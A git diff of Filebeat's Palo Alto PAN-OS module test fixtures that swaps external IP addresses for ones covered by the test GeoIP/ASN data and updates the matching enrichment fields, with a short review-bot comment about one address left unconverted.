@@ -8690,7 +8350,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,89.160.20.156,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8703,9 +8363,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 36112, + "log.offset": 35972, "network.application": "google-analytics", - "network.community_id": "1:5z6QdMj01RaYM1NdZtQSRQgE9gk=", + "network.community_id": "1:8xEo6/LvOntD+xMHdXzKIXv9JxE=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8737,13 +8397,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.201" + "89.160.20.156" ], "related.user": [ "picard" ], "rule.name": "rule1", - "server.ip": "74.125.224.201", + "server.ip": "89.160.20.156", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", @@ -8759,7 +8419,7 @@ }, { "@timestamp": "2012-04-09T06:54:35.000-02:00", - "client.ip": "74.125.224.200", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -8775,7 +8435,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8787,9 +8447,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 36494, + "log.offset": 36353, "network.application": "google-maps", - "network.community_id": "1:Ut9W+vlgpMAH7M4p87nZ/gF7zO8=", + "network.community_id": "1:diAtdns9tWiH2bS++Pup9kMV+AI=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8821,7 +8481,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.200" + "81.2.69.143" ], "related.user": [ "picard" 
@@ -8831,16 +8491,17 @@ "server.port": 50108, "server.user.name": "picard", "service.type": "panw", - "source.address": "74.125.224.200", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.200", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 80, "tags": [ "forwarded", @@ -8849,7 +8510,7 @@ }, { "@timestamp": "2012-04-09T06:54:55.000-02:00", - "client.ip": "74.125.224.200", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -8865,7 +8526,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8877,9 +8538,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 36869, + "log.offset": 36725, "network.application": "google-maps", - "network.community_id": "1:MNjszUBgbVupAxKdr7W7OIvU2lo=", + "network.community_id": "1:cs7mutkQqIorGFAbWD2/09AnYXk=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8911,7 +8572,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.200" + "81.2.69.143" ], "related.user": [ "picard" 
@@ -8921,16 +8582,17 @@ "server.port": 50387, "server.user.name": "picard", "service.type": "panw", - "source.address": "74.125.224.200", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.200", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 80, "tags": [ "forwarded", @@ -8943,13 +8605,6 @@ "client.port": 59781, "client.user.name": "jordy", "destination.address": "208.85.40.48", - "destination.as.number": 40428, - "destination.as.organization.name": "Pandora Media, Inc", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.geo.name": "United States", "destination.ip": "208.85.40.48", "destination.port": 80, @@ -8975,7 +8630,7 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 37244, + "log.offset": 37097, "network.application": "pandora", "network.community_id": "1:PzMJQoALQDxnDaqwOEEz4zxyhHU=", "network.direction": "inbound", @@ -9031,7 +8686,7 @@ }, { "@timestamp": "2012-04-09T03:45:45.000-02:00", - "client.ip": "74.125.224.201", + "client.ip": "89.160.20.156", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
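Review bot: In the hunk starting `@@ -8943,13 +8605,6 @@`, the address `208.85.40.48` is kept in the fixture while its `destination.as.*` and `destination.geo.*` fields are removed, whereas every other external address in these hunks was replaced by one covered by the test GeoIP/ASN data (for example `81.2.69.143`, `89.160.20.156`, `67.43.156.12`). The effect is that this one expected event no longer asserts any AS or geo enrichment for the destination, only its absence, which is presumably not the intent given the rest of the change. If the goal is that every fixture address resolves in the test database, the matching line in the module's sample log should be switched to a covered address so the expectation keeps exercising the enrichment path; that log input is outside this view, so this is inferred from the expected output alone. The enclosing file section begins before the first line shown here.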
@@ -9047,7 +8702,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,89.160.20.156,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -9059,9 +8714,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 37631, + "log.offset": 37484, "network.application": "google-maps", - "network.community_id": "1:ThkQfWduH5PZoI7qa/R4rWqT2VM=", + "network.community_id": "1:8xnlPG6iTh0CwnSMVwmWkniCAeM=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -9093,7 +8748,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.201" + "89.160.20.156" ], "related.user": [ "jordy" 
@@ -9103,16 +8758,19 @@ "server.port": 60005, "server.user.name": "jordy", "service.type": "panw", - "source.address": "74.125.224.201", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, "source.geo.name": "United States", - "source.ip": "74.125.224.201", + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "source.port": 80, "tags": [ "forwarded", @@ -9121,7 +8779,7 @@ }, { "@timestamp": "2012-04-09T03:49:17.000-02:00", - "client.ip": "74.125.224.201", + "client.ip": "89.160.20.156", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -9137,7 +8795,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,89.160.20.156,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -9149,9 +8807,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 38005, + "log.offset": 37857, "network.application": "google-maps", - "network.community_id": "1:Fd/TWc6RIS9q2bsgzztXrAAL4Ek=", + "network.community_id": "1:SQGgi8ETBszNJv+EzlSRiGB/m5A=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -9183,7 +8841,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.201" + "89.160.20.156" ], "related.user": [ "jordy" 
@@ -9193,16 +8851,19 @@ "server.port": 60443, "server.user.name": "jordy", "service.type": "panw", - "source.address": "74.125.224.201", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "89.160.20.156", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, "source.geo.name": "United States", - "source.ip": "74.125.224.201", + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "source.port": 80, "tags": [ "forwarded", @@ -9211,7 +8872,7 @@ }, { "@timestamp": "2012-04-09T03:53:41.000-02:00", - "client.ip": "74.125.224.200", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -9227,7 +8888,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -9239,9 +8900,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 38377, + "log.offset": 38228, "network.application": "google-maps", - "network.community_id": "1:7gqxhjxtnxyQnsvGukcI+WZWzAY=", + "network.community_id": "1:21uyYLV+/XbEeb+gCdBr5K1MWLU=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -9273,7 +8934,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.200" + "81.2.69.143" ], "related.user": [ "jordy" 
@@ -9283,16 +8944,17 @@ "server.port": 60822, "server.user.name": "jordy", "service.type": "panw", - "source.address": "74.125.224.200", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.200", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 80, "tags": [ "forwarded", @@ -9301,7 +8963,7 @@ }, { "@timestamp": "2012-04-09T03:55:23.000-02:00", - "client.ip": "74.125.224.200", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -9317,7 +8979,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -9329,9 +8991,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 38749, + "log.offset": 38597, "network.application": "google-maps", - "network.community_id": "1:ZzHOd7AFzjbGqVCj9S3bTNHFX4Q=", + "network.community_id": "1:QEEd+0of3hSmO6x9aRpIaHXdaUI=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -9363,7 +9025,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.200" + "81.2.69.143" ], "related.user": [ "jordy" 
@@ -9373,16 +9035,17 @@ "server.port": 61105, "server.user.name": "jordy", "service.type": "panw", - "source.address": "74.125.224.200", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.200", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 80, "tags": [ "forwarded", @@ -9391,7 +9054,7 @@ }, { "@timestamp": "2012-04-09T03:55:52.000-02:00", - "client.ip": "74.125.224.198", + "client.ip": "81.2.69.193", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -9407,7 +9070,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -9420,9 +9083,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 39122, + "log.offset": 38967, "network.application": "google-analytics", - "network.community_id": "1:uH37XIov0Sgv5kARW8dP9vrOs7w=", + "network.community_id": "1:BnyjuRL2HOxT/uRoNE3ra3neRSY=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -9454,7 +9117,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.198" + "81.2.69.193" ], "related.user": [ "jordy" 
@@ -9464,16 +9127,17 @@ "server.port": 60782, "server.user.name": "jordy", "service.type": "panw", - "source.address": "74.125.224.198", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.193", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.198", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": 80, "tags": [ "forwarded", @@ -9482,7 +9146,7 @@ }, { "@timestamp": "2012-04-09T04:03:55.000-02:00", - "client.ip": "74.125.224.200", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -9498,7 +9162,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -9510,9 +9174,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 39497, + "log.offset": 39339, "network.application": "google-maps", - "network.community_id": "1:9jnjFXERN6VFakI1U/qwzyqifzg=", + "network.community_id": "1:eGnclJrBulAHa+EiT+kLvValbJE=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -9544,7 +9208,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.200" + "81.2.69.143" ], "related.user": [ "jordy" 
@@ -9554,16 +9218,17 @@ "server.port": 61470, "server.user.name": "jordy", "service.type": "panw", - "source.address": "74.125.224.200", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.200", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 80, "tags": [ "forwarded", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log index 70d2804a7127..32d2e1ba1c46 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log 
@@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 